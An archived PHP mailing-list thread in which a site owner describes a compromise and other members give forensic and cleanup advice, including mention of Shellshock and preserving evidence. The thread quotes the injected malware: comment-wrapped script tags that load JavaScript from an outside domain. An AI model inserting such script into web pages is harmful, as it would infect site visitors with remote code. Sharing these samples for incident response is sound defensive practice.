Re: Re: hacked!!

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




------------ Original Message ------------
> Date: Tuesday, October 07, 2014 20:36:00 -0400
> From: Jim Giner <jim.giner@xxxxxxxxxxxxxxxxxx>
> To: php-general@xxxxxxxxxxxxx
> Subject: Re:  Re: hacked!!
>
> On 10/7/2014 6:10 PM, Kevin Kinsey wrote:
>> On Fri, Oct 03, 2014 at 07:54:22PM -0400, Jim Giner wrote:
>>> If anyone is interested here is what is being inserted into
>>> random html and php files:
>>> 
>>> <!--f853a8--><script type="text/javascript"
>>> src="http://hs-eventogbooking.dk/mytdhzzp.php?id=9625138";></scri
>>> pt><!--/f853a8-->
>>> 
>>> and
>>> 
>>> <!--83b914--><script type="text/javascript"
>>> src="http://n/mytdhzzp.php?id=9625233";></script><!--/83b914-->
>>> 
>> 
>> Hi Jim,
>> 
>> Thanks for being open and sharing this information.  I'm sorry I'm
>> late to the party.
>> 
>> IANAE on security, but I have some experience with forensics and
>> server administration as well as identifying attack vectors in
>> PHP and ColdFusion and mitigating them.
>> 
>> Off the top of my head, this *looks* a tad like code injection
>> via an unknown vector.  By chance, are these code snippets
>> attached to the *end* of the files that contain them?
>> 
>> Keep copies of the infected files, with accurate timestamps for
>> the date of last modification.
>> 
>> If you can obtain server access logs, it would be prudent to
>> search them (with a "find" tool, like Unix 'grep' or the search
>> features of your favorite editor, for the strings in the HTML
>> comment sections, portions of the suspect URLs, etc.
>> 
>> Your web host will perhaps listen well if you pay them well, and
>> the less you pay them, the less likely they are to be concerned.
>> However, I would open a ticket and advise them of what has
>> occurred.  Ask them some questions, like what kind of security
>> software is installed on their shared server, whether or not they
>> monitor network traffic for suspect packets, *whether or not the
>> server is vulnerable to "bash shell shock" (CVE-2014-6271 and
>> CVE-2014-7169) (also known as "bashdoor")*.
>> 
>> If your website has *no* third-party software built in, that's
>> good news, up to a point.  It may indeed be that your code is
>> "tough enough" and the hole was not in your code.  Given the
>> severity of ShellShock and the fact that your server contains
>> other peoples' sites as well, which may have 3rd party packages
>> that are vulnerable, I might think rather seriously about using a
>> VM, as others have suggested, in the future if at all feasible.
>> 
>> Hope this helps,
>> 
>> Kevin Kinsey
>> 
> I'm afraid I can't keep the info you mentioned since I already
> cleaned this up.  Yes - some of the problem was with large chunks
> of code at the bottom of a couple of index.php files.  Most of it
> was a small commented out piece of <script> code that called some
> site in Germany.  I have a utility to scan every file in my domain
> that helped me find all the occurrences (about 30) which I then
> updated after cleaning them.
> 
> Thanks for the tips tho.

When dealing with a hacked site it is always best to snapshot the
whole site - not limiting to the documentroot -- making certain to
preserve everything including file dates/times, permissions,
ownerships, etc., and capturing any hidden directories or files (a
common method for leaving backdoors) - before cleaning anything up.
That way there is something that can be reviewed at a later stage.

If you haven't been able to pinpoint the source of the intrusion, I
would suggest using your utility to scan your site on a very regular
basis.


    - Richard




-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php





[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux